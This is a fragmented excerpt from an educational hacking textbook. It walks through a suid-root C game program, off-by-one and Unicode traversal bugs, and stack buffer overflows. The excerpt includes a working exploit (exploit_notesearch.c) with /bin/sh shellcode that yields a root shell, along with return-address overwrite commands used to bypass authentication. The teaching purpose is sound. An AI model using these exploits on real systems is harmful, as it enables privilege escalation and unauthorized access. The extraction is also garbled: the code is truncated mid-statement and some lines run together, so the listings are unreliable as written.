It has three different
game functions, which are called using a single global function pointer, and
it uses structs to hold data for the player, which is saved in a file
...
The game_of_chance
...

102

0x 200

game_of_chance
...
h>
...
h>
...
h>
...
h"

#define DATAFILE "/var/chance
...

if(get_player_data() == -1)
register_new_player();

// Try to read player data from file
...

while(choice != 7) {
printf("-=[ Game of Chance Menu ]=-\n");
printf("1 - Play the Pick a Number game\n");
printf("2 - Play the No Match Dealer game\n");
printf("3 - Play the Find the Ace game\n");
printf("4 - View current high score\n");
printf("5 - Change your user name\n");

Pr og ra mm in g

103

printf("6 - Reset your account at 100 credits\n");
printf("7 - Quit\n");
printf("[Name: %s]\n", player
...
credits);
scanf("%d", &choice);
if((choice < 1) || (choice > 7))
printf("\n[!!] The number %d is an invalid selection
...

if(choice != last_game) { // If the function ptr isn't set
if(choice == 1)
// then point it at the selected game
player
...
current_game = dealer_no_match;
else
player
...

}
play_the_game();
// Play the game
...
\n\n");
}
else if (choice == 6) {
printf("\nYour account has been reset with 100 credits
...
credits = 100;
}
}
update_player_data();
printf("\nThanks for playing! Bye
...
It returns -1 if it is unable to find player
// data for the current uid
...

while(entry
...

read_bytes = read(fd, &entry, sizeof(struct user)); // Keep reading
...

if(read_bytes < sizeof(struct user)) // This means that the end of file was reached
...

return 1;
// Return a success
...

// It will create a new player account and append it to the file
...
uid = getuid();
player
...
credits = 100;
fd = open(DATAFILE, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
if(fd == -1)
fatal("in register_new_player() while opening file");
write(fd, &player, sizeof(struct user));
close(fd);
printf("\nWelcome to the Game of Chance %s
...
name);
printf("You have been given %u credits
...
credits);
}
// This function writes the current player data to the file
...

void update_player_data() {
int fd, i, read_uid;
char burned_byte;
fd = open(DATAFILE, O_RDWR);
if(fd == -1) // If open fails here, something is really wrong
...

while(read_uid != player
...

for(i=0; i < sizeof(struct user) - 4; i++) // Read through the
read(fd, &burned_byte, 1);
// rest of that struct
...

}
write(fd, &(player
...

write(fd, &(player
...

write(fd, &(player
...

close(fd);
}
// This function will display the current high score and
// the name of the person who set that high score
...

if(entry
...
highscore; // set top_score to that score
strcpy(top_name, entry
...

}
}
close(fd);
if(top_score > player
...
highscore);
printf("======================================================\n\n");
}
// This function simply awards the jackpot for the Pick a Number game
...
credits += 100;
}
// This function is used to input the player name, since
// scanf("%s", &whatever) will stop input at the first space
...

name_ptr = (char *) &(player
...

*name_ptr = input_char;
// Put the input char into name field
...

name_ptr++;
// Increment the name pointer
...

}
// This function prints the 3 cards for the Find
// It expects a message to display, a pointer to
// and the card the user has picked as input
...

void print_cards(char *message, char *cards, int
int i;

the Ace game
...
_
...
_
...
_
...
It expects the available credits and the
// previous wager as arguments
...
The function
// returns -1 if the wager is too big or too little, and it returns
// the wager amount otherwise
...

printf("Nice try, but you must wager a positive number!\n");
return -1;
}
total_wager = previous_wager + wager;
if(total_wager > available_credits) { // Confirm available credits
printf("Your total wager of %d is more than you have!\n", total_wager);
printf("You only have %d available credits, try again
...
It also writes the new credit totals to file
// after each game is played
...
current_game);
if(player
...
credits > player
...
highscore = player
...

printf("\nYou now have %u credits\n", player
...

printf("Would you like to play again? (y/n) ");
selection = '\n';
while(selection == '\n')
// Flush any extra newlines
...

Pr og ra mm in g

107

}
}
// This function is the Pick a Number game
...

int pick_a_number() {
int pick, winning_number;
printf("\n####### Pick a Number ######\n");
printf("This game costs 10 credits to play
...

if(player
...
That's not enough to play!\n\n", player
...
credits -= 10; // Deduct 10 credits
...
\n");
printf("Pick a number between 1 and 20: ");
scanf("%d", &pick);
printf("The winning number is %d\n", winning_number);
if(pick == winning_number)
jackpot();
else
printf("Sorry, you didn't win
...

// It returns -1 if the player has 0 credits
...
\n");
printf("The dealer will deal out 16 random numbers between 0 and 99
...
credits == 0) {
printf("You don't have any credits to wager!\n\n");
return -1;
}
while(wager == -1)
wager = take_wager(player
...

printf("%2d\t", numbers[i]);
if(i%8 == 7)
// Print a line break every 8 numbers
...

108

0x 200

j = i + 1;
while(j < 16) {
if(numbers[i] == numbers[j])
match = numbers[i];
j++;
}
}
if(match != -1) {
printf("The dealer matched the number %d!\n", match);
printf("You lose %d credits
...
credits -= wager;
} else {
printf("There were no matches! You win %d credits!\n", wager);
player
...

// It returns -1 if the player has 0 credits
...

printf("******* Find the Ace *******\n");
printf("In this game, you can wager up to all of your credits
...
\n");
printf("If you find the ace, you will win your wager
...
\n");
printf("At this point, you may either select a different card or\n");
printf("increase your wager
...
credits == 0) {
printf("You don't have any credits to wager!\n\n");
return -1;
}
while(wager_one == -1) // Loop until valid wager is made
...
credits, 0);
print_cards("Dealing cards", cards, -1);
pick = -1;
while((pick < 1) || (pick > 3)) { // Loop until valid pick is made
...

i=0;
while(i == ace || i == pick) // Keep looping until
i++;
// we find a valid queen to reveal
...

printf("Would you like to:\n[c]hange your pick\tor\t[i]ncrease your wager?\n");
printf("Select c or i: ");
choice_two = '\n';
while(choice_two == '\n') // Flush extra newlines
...

invalid_choice=0;
// This is a valid choice
...

wager_two = take_wager(player
...

i = invalid_choice = 0; // Valid choice
while(i == pick || cards[i] == 'Q') // Loop until the other card
i++;
// is found,
pick = i;
// and then swap pick
...

if(ace == i)
cards[i] = 'A';
else
cards[i] = 'Q';
}
print_cards("End result", cards, pick);
if(pick == ace) { // Handle win
...
credits += wager_one;
if(wager_two != -1) {
printf("and an additional %d credits from your second wager!\n", wager_two);
player
...

printf("You have lost %d credits from your first wager\n", wager_one);
player
...
credits -= wager_two;
}
}
return 0;
}

Since this is a multi-user program that writes to a file in the /var directory, it must be suid root
...
c
sudo chown root:root
...
/game_of_chance

...

You have been given 100 credits
...
Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!
10 credits have been deducted from your account
...

Sorry, you didn't win
...

Would you like to play again? (y/n) n
-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 90 credits] -> 2
[DEBUG] current_game pointer @ 0x08048f61
::::::: No Match Dealer :::::::
In this game you can wager up to all of your credits
...

If there are no matches among them, you double your money!
How many of your 90 credits would you like to wager? 30
::: Dealing out 16 random numbers :::
88
68
82
51
21
73
80
50
11
64
78
85
39
42
40
95
There were no matches! You win 30 credits!
You now have 120 credits
Pr og ra mm in g

111

Would you like to play again? (y/n) n
-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 120 credits] -> 3
[DEBUG] current_game pointer @ 0x0804914c
******* Find the Ace *******
In this game you can wager up to all of your credits
...

If you find the ace, you will win your wager
...

At this point you may either select a different card or
increase your wager
...
_
...
_
...
_
...
_
...
_
...
_
...

*** End result ***

...

...

...

Cards: |A|
|Q|
|Q|
^-- your pick
You have won 50 credits from your first wager
...

Would you like to play again? (y/n) n
-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit

112

0x 200

50

[Name: Jon Erickson]
[You have 170 credits] ->

4

====================| HIGH SCORE |====================
You currently have the high score of 170 credits!
======================================================
-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 170 credits] -> 7
Thanks for playing! Bye
...
/game_of_chance
-=-={ New Player Registration }=-=Enter your name: Jose Ronnick
Welcome to the Game of Chance Jose Ronnick
...

-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score 5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jose Ronnick]
[You have 100 credits] -> 4
====================| HIGH SCORE |====================
Jon Erickson has the high score of 170
...

jose@hacking:~/booksrc $ exit
exit
reader@hacking:~/booksrc $

Pr og ra mm in g

113

Play around with this program a little bit
...
Many people have difficulty understanding
this truth—that’s why it’s counterintuitive
...

114

0x 200

0x300
EXPLOITATION

Program exploitation is a staple of hacking
...

Exploiting a program is simply a clever way of getting
the computer to do what you want it to do, even if the
currently running program was designed to prevent that action
...
It takes a creative mind to find these holes and
to write programs that compensate for them
...

A program can only do what it’s programmed to do, to the letter of the law
...
This principle can be explained with a joke:
A man is walking through the woods, and he finds a magic lamp on
the ground
...
The genie thanks the man for
freeing him, and offers to grant him three wishes
...

“First,” says the man, “I want a billion dollars
...

The man is wide eyed in amazement and continues, “Next, I want
a Ferrari
...

The man continues, “Finally, I want to be irresistible to women
...

Just as the man’s final wish was granted based on what he said, rather
than what he was thinking, a program will follow its instructions exactly, and
the results aren’t always what the programmer intended
...

Programmers are human, and sometimes what they write isn’t exactly
what they mean
...
As the name implies, it’s an error where the programmer has
miscounted by one
...
This
type of off-by-one error is commonly called a fencepost error, and it occurs when a
programmer mistakenly counts items instead of spaces between items, or
vice versa
...
If N = 5 and M = 17,
how many items are there to process? The obvious answer is M - N, or 17 - 5 = 12
items
...
This may seem counterintuitive at first glance, because it is, and
that’s exactly why these errors happen
...
However, when the program is fed
the input that makes the effects of the error manifest, the consequences of the
error can have an avalanche effect on the rest of the program logic
...

One classic example of this is OpenSSH, which is meant to be a secure
terminal communication program suite, designed to replace insecure and
116

0x 300

unencrypted services such as telnet, rsh, and rcp
...
Specifically, the code included an if statement that read:
if (id < 0 || id > channels_alloc) {

It should have been
if (id < 0 || id >= channels_alloc) {

In plain English, the code reads If the ID is less than 0 or the ID is greater
than the channels allocated, do the following stuff, when it should have been If the
ID is less than 0 or the ID is greater than or equal to the channels allocated, do the
following stuff
...
This type of functionality certainly wasn’t
what the programmers had intended for a secure program like OpenSSH,
but a computer can only do what it’s told
...
While this
increase in functionality makes the program more marketable and increases
its value, it also increases the program’s complexity, which increases the
chances of an oversight
...
In order to accomplish this,
the program must allow users to read, write, and execute programs and files
within certain directories; however, this functionality must be limited to those
particular directories
...
To
prevent this situation, the program has path-checking code designed to
prevent users from using the backslash character to traverse backward through
the directory tree and enter other directories
...
Unicode is a double-byte
character set designed to provide characters for every language, including
Chinese and Arabic
...
This additional complexity
means that there are now multiple representations of the backslash character
...
So by using
%5c instead of \, it was indeed possible to traverse directories, allowing
the aforementioned security dangers
...

A related example of this letter-of-the-law principle used outside the
realm of computer programming is the LaMacchia Loophole
...

Near the end of 1993, a 21-year-old computer hacker and student at MIT
named David LaMacchia set up a bulletin board system called Cynosure for
the purposes of software piracy
...
The service was only
online for about six weeks, but it generated heavy network traffic worldwide,
which eventually attracted the attention of university and federal authorities
...
However,
the charge was dismissed because what LaMacchia was alleged to have done
wasn’t criminal conduct under the Copyright Act, since the infringement
was not for the purpose of commercial advantage or private financial gain
...

(Congress closed this loophole in 1997 with the No Electronic Theft Act
...
The abstract concepts of
hacking transcend computing and can be applied to many other aspects
of life that involve complex systems
...
However, there are some common mistakes that can be exploited
in ways that aren’t so obvious
...

Because the same type of mistake is made in many different places, generalized exploit techniques have evolved to take advantage of these mistakes, and
they can be used in a variety of situations
...
These include
common exploit techniques like buffer overflows as well as less-common
methods like format string exploits
...

This type of process hijacking is known as execution of arbitrary code, since the
hacker can cause a program to do pretty much anything he or she wants it to
...
Under
normal conditions, these unexpected cases cause the program to crash—
metaphorically driving the execution flow off a cliff
...

118

0x 300

0x320

Buffer Overflows
Buffer overflow vulnerabilities have been around since the early days of computers and still exist today
...

C is a high-level programming language, but it assumes that the
programmer is responsible for data integrity
...
Also, this would remove a
significant level of control from the programmer and complicate the
language
...
This
means that once a variable is allocated memory, there are no built-in safeguards to ensure that the contents of a variable fit into the allocated memory
space
...
This is known as a
buffer overrun or buffer overflow, since the extra two bytes of data will overflow
and spill out of the allocated memory, overwriting whatever happens to
come next
...

The overflow_example
...

overflow_example
...
h>
#include ...
*/
strcpy(buffer_two, "two"); /* Put "two" into buffer_two
...
*/
printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value);
}

Ex pl oit a ti on

119

By now, you should be able to read the source code above and figure out
what the program does
...

reader@hacking:~/booksrc $ gcc -o overflow_example overflow_example
...
/overflow_example 1234567890
[BEFORE] buffer_two is at 0xbffff7f0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7f8 and contains 'one'
[BEFORE] value is at 0xbffff804 and is 5 (0x00000005)
[STRCPY] copying 10 bytes into buffer_two
[AFTER] buffer_two is at 0xbffff7f0 and contains '1234567890'
[AFTER] buffer_one is at 0xbffff7f8 and contains '90'
[AFTER] value is at 0xbffff804 and is 5 (0x00000005)
reader@hacking:~/booksrc $

Notice that buffer_one is located directly after buffer_two in memory, so
when ten bytes are copied into buffer_two, the last two bytes of 90 overflow
into buffer_one and overwrite whatever was there
...

reader@hacking:~/booksrc $
...
The programmer’s
mistake is one of omission—there should be a length check or restriction on
the user-supplied input
...
In fact, the notesearch
...
You might not have noticed this until right now, even if you
were already familiar with C
...
/notesearch AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-------[ end of note data ]------Segmentation fault
reader@hacking:~/booksrc $

120

0x 300

Program crashes are annoying, but in the hands of a hacker they can
become downright dangerous
...
The exploit_notesearch
...

exploit_notesearch
...
h>
#include ...
h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // Zero out the new memory
...
/notesearch \'"); // Start command buffer
...

if(argc > 1) // Set offset
...

for(i=0; i < 160; i+=4) // Fill buffer with return address
...

memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // Run exploit
...
It uses string
functions to do this: strlen() to get the current length of the string (to position
the buffer pointer) and strcat() to concatenate the closing single quote to the
end
...

The buffer that is generated between the single quotes is the real meat of the
exploit
...
Watch
what a controlled crash can do
...
c
reader@hacking:~/booksrc $
...
out
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]------sh-3
...
This is an example of a stack-based buffer
overflow exploit
...
The auth_overflow
...

auth_overflow
...
h>
#include ...
h>
int check_authentication(char *password) {
int auth_flag = 0;
char password_buffer[16];
strcpy(password_buffer, password);
if(strcmp(password_buffer, "brillig") == 0)
auth_flag = 1;
if(strcmp(password_buffer, "outgrabe") == 0)
auth_flag = 1;
return auth_flag;
}
int main(int argc, char *argv[]) {
if(argc < 2) {
printf("Usage: %s \n", argv[0]);
exit(0);
}
if(check_authentication(argv[1])) {
printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
printf("
Access Granted
...
\n");
}
}

This example program accepts a password as its only command-line
argument and then calls a check_authentication() function
...
If either of these passwords is used, the function returns 1, which
grants access
...
Use the -g option when you do compile
it, though, since we will be debugging this later
...
c
reader@hacking:~/booksrc $
...
/auth_overflow
reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $
...

-=-=-=-=-=-=-=-=-=-=-=-=-=reader@hacking:~/booksrc $
...

-=-=-=-=-=-=-=-=-=-=-=-=-=reader@hacking:~/booksrc $

So far, everything works as the source code says it should
...
But an
overflow can lead to unexpected and even contradictory behavior, allowing
access without a proper password
...
/auth_overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-=-=-=-=-=-=-=-=-=-=-=-=-=Access Granted
...

reader@hacking:~/booksrc $ gdb -q
...
so
...

(gdb) list 1
1
#include ...
h>
3
#include ...
c, line 9
...
c, line 16
...
When the program is run,
execution will pause at these breakpoints and give us a chance to examine
memory
...
c:9
9
strcpy(password_buffer, password);
(gdb) x/s password_buffer
0xbffff7a0:
")????o??????)\205\004\b?o??p???????"
(gdb) x/x &auth_flag
0xbffff7bc:
0x00000000
(gdb) print 0xbffff7bc - 0xbffff7a0
$1 = 28
(gdb) x/16xw password_buffer
0xbffff7a0:
0xb7f9f729
0xb7fd6ff4
0xbffff7d8
0x08048529
0xbffff7b0:
0xb7fd6ff4
0xbffff870
0xbffff7d8
0x00000000
0xbffff7c0:
0xb7ff47b0
0x08048510
0xbffff7d8
0x080484bb
0xbffff7d0:
0xbffff9af
0x08048510
0xbffff838
0xb7eafebc
(gdb)

The first breakpoint is before the strcpy() happens
...
By examining the
address of the auth_flag variable, we can see both its location at 0xbffff7bc
and its value of 0
...
This relationship
can also be seen in a block of memory starting at password_buffer
...

124

0x 300

(gdb) continue
Continuing
...
c:16
16
return auth_flag;
(gdb) x/s password_buffer
0xbffff7a0:
'A'
(gdb) x/x &auth_flag
0xbffff7bc:
0x00004141
(gdb) x/16xw password_buffer
0xbffff7a0:
0x41414141
0x41414141
0x41414141
0x41414141
0xbffff7b0:
0x41414141
0x41414141
0x41414141
0x00004141
0xbffff7c0:
0xb7ff47b0
0x08048510
0xbffff7d8
0x080484bb
0xbffff7d0:
0xbffff9af
0x08048510
0xbffff838
0xb7eafebc
(gdb) x/4cb &auth_flag
0xbffff7bc:
65 'A' 65 'A' 0 '\0' 0 '\0'
(gdb) x/dw &auth_flag
0xbffff7bc:
16705
(gdb)

Continuing to the next breakpoint found after the strcpy(), these memory
locations are examined again
...
The value of 0x00004141 might look backward
again, but remember that x86 has little-endian architecture, so it’s supposed to
look that way
...
Ultimately, the program will treat this
value as an integer, with a value of 16705
...

-=-=-=-=-=-=-=-=-=-=-=-=-=Access Granted
...

(gdb)

After the overflow, the check_authentication() function will return 16705
instead of 0
...
In this example, the auth_flag variable is the execution control point,
since overwriting this value is the source of the control
...
In auth_overflow2
...

(Changes to auth_overflow
...
)

Ex pl oit a ti on

125

auth_overflow2
...
h>
#include ...
h>
int check_authentication(char *password) {
char password_buffer[16];
int auth_flag = 0;
strcpy(password_buffer, password);
if(strcmp(password_buffer, "brillig") == 0)
auth_flag = 1;
if(strcmp(password_buffer, "outgrabe") == 0)
auth_flag = 1;
return auth_flag;
}
int main(int argc, char *argv[]) {
if(argc < 2) {
printf("Usage: %s \n", argv[0]);
exit(0);
}
if(check_authentication(argv[1])) {
printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
printf("
Access Granted
...
\n");
}
}

This simple change puts the auth_flag variable before the password_buffer
in memory
...

reader@hacking:~/booksrc $ gcc -g auth_overflow2
...
/a
...
so
...

(gdb) list 1
1
#include ...
h>
3
#include ...
c, line 9
...
c, line 16
...
out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 1, check_authentication (password=0xbffff9b7 'A' ) at
auth_overflow2
...
This means auth_flag can never be overwritten by an overflow in
password_buffer
...

Breakpoint 2, check_authentication (password=0xbffff9b7 'A' )
at auth_overflow2
...
But another execution control point does exist,
even though you can’t see it in the C code
...
This memory is integral to the
operation of all programs, so it exists in all programs, and when it’s overwritten, it usually results in a program crash
...

Program received signal SIGSEGV, Segmentation fault
...
The stack is a FILO data structure used to
maintain execution flow and context for local variables during function calls
...
Each stack
return_value variable
frame contains the local variables for that
function and a return address so EIP can be
restored
...
All of this is built
in to the architecture and is usually handled by
Saved frame pointer (SFP)
the compiler, not the programmer
...
In this frame
main()’s stack frame
are the local variables, a return address, and the
function’s arguments
...

reader@hacking:~/booksrc $ gcc -g auth_overflow2
...
/a
...
so
...

(gdb) list 1
1
#include ...
h>
3
#include ...
\n");
27
printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
28
} else {
29
printf("\nAccess Denied
...
c, line 24
...
c, line 9
...
c, line 16
...
out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 1, main (argc=2, argv=0xbffff874) at auth_overflow2
...
At this point, the stack pointer register (ESP) is 0xbffff7e0, and the
top of the stack is shown
...
Continuing to the next breakpoint inside check_authentication(), the output below
shows ESP is smaller as it moves up the list of memory to make room for
check_authentication()’s stack frame (shown in bold), which is now on the
stack
...

Ex pl oit a ti on

129

(gdb) c
Continuing
...
c:9
9
strcpy(password_buffer, password);
(gdb) i r esp
esp
0xbffff7a0
0xbffff7a0
(gdb) x/32xw $esp
0xbffff7a0:
0x00000000
0x08049744
0xbffff7b8
0x080482d9
0x00000000
0xbffff7b0:
0xb7f9f729
0xb7fd6ff4
0xbffff7e8
0xb7fd6ff4
0xbffff880
0xbffff7e8
0xb7fd6ff4
0xbffff7c0:
0xbffff7d0:
0xb7ff47b0
0x08048510
0xbffff7e8
0x080484bb
0xbffff7e0:
0xbffff9b7
0x08048510
0xbffff848
0xb7eafebc
0xbffff7f0:
0x00000002
0xbffff874
0xbffff880
0xb8001898
0xbffff800:
0x00000000
0x00000001
0x00000001
0x00000000
0xbffff810:
0xb7fd6ff4
0xb8000ce0
0x00000000
0xbffff848
(gdb) p 0xbffff7e0 - 0xbffff7a0
$1 = 64
(gdb) x/s password_buffer
0xbffff7c0:
"?o??\200????????o???G??\020\205\004\b?????\204\004\b????\020\205\004\
bH???????\002"
(gdb) x/x &auth_flag
0xbffff7bc:
0x00000000
(gdb)

Continuing to the second breakpoint in check_authentication(), a stack
frame (shown in bold) is pushed onto the stack when the function is called
...
The size and structure of a stack
frame can vary greatly, depending on the function and certain compiler
optimizations
...
The local stack variables, auth_flag and
password_buffer, are shown at their respective memory locations in the stack
frame
...

The stack frame contains more than just the local variables and padding
...

First, the memory saved for the local variables is shown in italic
...
The next few values on the stack are just
padding the compiler threw in, plus something called the saved frame pointer
...
At the value
0x080484bb is the return address of the stack frame, and at
the address
0xbffffe9b7 is a pointer to a string containing 30 As
...

(gdb) x/32xw $esp
0xbffff7a0:
0x00000000
0xbffff7b0:
0xb7f9f729
0xbffff7c0:
0xb7fd6ff4

130

0x 300

0x08049744
0xb7fd6ff4
0xbffff880

0xbffff7b8
0xbffff7e8
0xbffff7e8

0x080482d9
0x00000000
0xb7fd6ff4

0xbffff7d0:
0xb7ff47b0
0x08048510
0xbffff9b7
0x08048510
0xbffff7e0:
0xbffff7f0:
0x00000002
0xbffff874
0xbffff800:
0x00000000
0x00000001
0xbffff810:
0xb7fd6ff4
0xb8000ce0
(gdb) x/32xb 0xbffff9b7
0xbffff9b7:
0x41
0x41
0x41
0x41
0xbffff9bf:
0x41
0x41
0x41
0x41
0xbffff9c7:
0x41
0x41
0x41
0x41
0xbffff9cf:
0x41
0x41
0x41
0x41
(gdb) x/s 0xbffff9b7
0xbffff9b7:
'A'
(gdb)

0xbffff7e8
0xbffff848
0xbffff880
0x00000001
0x00000000

0x080484bb
0xb7eafebc
0xb8001898
0x00000000
0xbffff848

0x41
0x41
0x41
0x41

0x41
0x41
0x41
0x00

0x41
0x41
0x41
0x41

0x41
0x41
0x41
0x53

The return address in a stack frame can be located by understanding
how the stack frame is created
...

(gdb) disass main
Dump of assembler code for function main:
0x08048474 :
push
ebp
0x08048475 :
mov
ebp,esp
0x08048477 :
sub
esp,0x8
0x0804847a :
and
esp,0xfffffff0
0x0804847d :
mov
eax,0x0
0x08048482 :
sub
esp,eax
0x08048484 :
cmp
DWORD PTR [ebp+8],0x1
0x08048488 :
jg
0x80484ab
0x0804848a :
mov
eax,DWORD PTR [ebp+12]
0x0804848d :
mov
eax,DWORD PTR [eax]
0x0804848f :
mov
DWORD PTR [esp+4],eax
0x08048493 :
mov
DWORD PTR [esp],0x80485e5
0x0804849a :
call
0x804831c
0x0804849f :
mov
DWORD PTR [esp],0x0
0x080484a6 :
call
0x804833c
0x080484ab :
mov
eax,DWORD PTR [ebp+12]
0x080484ae :
add
eax,0x4
0x080484b1 :
mov
eax,DWORD PTR [eax]
0x080484b3 :
mov
DWORD PTR [esp],eax
0x080484b6 :
call
0x8048414
0x080484bb :
test
eax,eax
0x080484bd :
je
0x80484e5
0x080484bf :
mov
DWORD PTR [esp],0x80485fb
0x080484c6 :
call
0x804831c
0x080484cb :
mov
DWORD PTR [esp],0x8048619
0x080484d2 :
call
0x804831c
0x080484d7 :
mov
DWORD PTR [esp],0x8048630
0x080484de : call
0x804831c
0x080484e3 : jmp
0x80484f1
0x080484e5 : mov
DWORD PTR [esp],0x804864d
0x080484ec : call
0x804831c
0x080484f1 : leave
0x080484f2 : ret
End of assembler dump
...
At this point, the EAX
register contains a pointer to the first command-line argument
...
This first assembly instruction writes EAX
to where ESP is pointing (the top of the stack)
...
The second instruction
is the actual call
...
The address pushed to the stack is the return
address for the stack frame
...

(gdb) disass check_authentication
Dump of assembler code for function check_authentication:
0x08048414 :
push
ebp
0x08048415 :
mov
ebp,esp
0x08048417 :
sub
esp,0x38

...

(gdb) p 0x38
$3 = 56
(gdb) p 0x38 + 4 + 4
$4 = 64
(gdb)

leave
ret

Execution will continue into the check_authentication() function as EIP is
changed, and the first few instructions (shown in bold above) finish saving
memory for the stack frame
...
The first two instructions are for the saved frame pointer, and the
third instruction subtracts 0x38 from ESP
...
The return address and the saved frame pointer
are already pushed to the stack and account for the additional 8 bytes of
the 64-byte stack frame
...
This brings the program execution back to
the next instruction in main() after the function call at 0x080484bb
...

(gdb) x/32xw $esp
0xbffff7a0:
0x00000000
0xbffff7b0:
0xb7f9f729
0xbffff7c0:
0xb7fd6ff4
0xbffff7d0:
0xb7ff47b0
0xbffff7e0:
0xbffff9b7
0xbffff7f0:
0x00000002
0xbffff800:
0x00000000
0xbffff810:
0xb7fd6ff4

132

0x 300

0x08049744
0xb7fd6ff4
0xbffff880
0x08048510
0x08048510
0xbffff874
0x00000001
0xb8000ce0

0xbffff7b8
0xbffff7e8
0xbffff7e8
0xbffff7e8
0xbffff848
0xbffff880
0x00000001
0x00000000

0x080482d9
0x00000000
0xb7fd6ff4
0x080484bb
0xb7eafebc
0xb8001898
0x00000000
0xbffff848

(gdb) cont
Continuing
...
c:16
16
return auth_flag;
(gdb) x/32xw $esp
0xbffff7a0:
0xbffff7c0
0x080485dc
0xbffff7b8
0x080482d9
0xbffff7b0:
0xb7f9f729
0xb7fd6ff4
0xbffff7e8
0x00000000
0xbffff7c0:
0x41414141
0x41414141
0x41414141
0x41414141
0x08004141
0xbffff7d0:
0x41414141
0x41414141
0x41414141
0xbffff7e0:
0xbffff9b7
0x08048510
0xbffff848
0xb7eafebc
0xbffff7f0:
0x00000002
0xbffff874
0xbffff880
0xb8001898
0xbffff800:
0x00000000
0x00000001
0x00000001
0x00000000
0xbffff810:
0xb7fd6ff4
0xb8000ce0
0x00000000
0xbffff848
(gdb) cont
Continuing
...

0x08004141 in ?? ()
(gdb)

When some of the bytes of the saved return address are overwritten, the
program will still try to use that value to restore the execution pointer register (EIP)
...
But this value doesn’t need to be random
...
But where should we tell it to go?

0x330

Experimenting with BASH
Since so much of hacking is rooted in exploitation and experimentation, the
ability to quickly try different things is vital
...

Perl is an interpreted programming language with a print command that
happens to be particularly suited to generating long sequences of characters
...
This command prints the character A 20 times
...
In the following
example, this notation is used to print the character A, which has the hexadecimal value of 0x41
...

This can be useful when stringing multiple addresses together
...
"BCD"
...
"Z";'
AAAAAAAAAAAAAAAAAAAABCDafgiafgiZ

An entire shell command can be executed like a function, returning its
output in place
...
Here are two examples:
reader@hacking:~/booksrc $ $(perl -e 'print "uname";')
Linux
reader@hacking:~/booksrc $ una$(perl -e 'print "m";')e
Linux
reader@hacking:~/booksrc $

In each case, the output of the command found between the parentheses
is substituted for the command, and the command uname is executed
...
You can use whichever
syntax feels more natural for you; however, the parentheses syntax is easier
to read for most people
...
You can use this technique to easily test
the overflow_example
...

reader@hacking:~/booksrc $
...
/overflow_example $(perl -e 'print "A"x20
...
Using this distance, the value
variable is overwritten with the exact value 0x44434241, since the characters A,
B, C, and D have the hex values of 0x41, 0x42, 0x43, and 0x44, respectively
...
This means if you wanted to control the value variable with something
exact, like 0xdeadbeef, you must write those bytes into memory in reverse order
...
/overflow_example $(perl -e 'print "A"x20
...
c program with an exact value
...

reader@hacking:~/booksrc $ gcc -g -o auth_overflow2 auth_overflow2
...
/auth_overflow2
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...

(gdb)

mov
mov
mov
call
mov
call
mov
add
mov
mov
call
test
je
mov
call
mov
call
mov
call
jmp
mov
call
leave
ret

eax,DWORD
DWORD PTR
DWORD PTR
0x804831c
DWORD PTR
0x804833c
eax,DWORD
eax,0x4
eax,DWORD
DWORD PTR
0x8048414
eax,eax
0x80484e5
DWORD PTR
0x804831c
DWORD PTR
0x804831c
DWORD PTR
0x804831c
0x80484f1
DWORD PTR
0x804831c

PTR [eax]
[esp+4],eax
[esp],0x80485e5

[esp],0x0

PTR [ebp+12]
PTR [eax]
[esp],eax

[esp],0x80485fb

[esp],0x8048619

[esp],0x8048630

[esp],0x804864d

This section of code shown in bold contains the instructions that display
the Access Granted message
...
The exact distance between the return address and
the start of the password_buffer can change due to different compiler versions
and different optimization flags
...
This way, at least one of the instances
will overwrite the return address, even if it has shifted around due to compiler
optimizations
...
/auth_overflow2 $(perl -e 'print "\xbf\x84\x04\x08"x10')
-=-=-=-=-=-=-=-=-=-=-=-=-=Access Granted
...
When
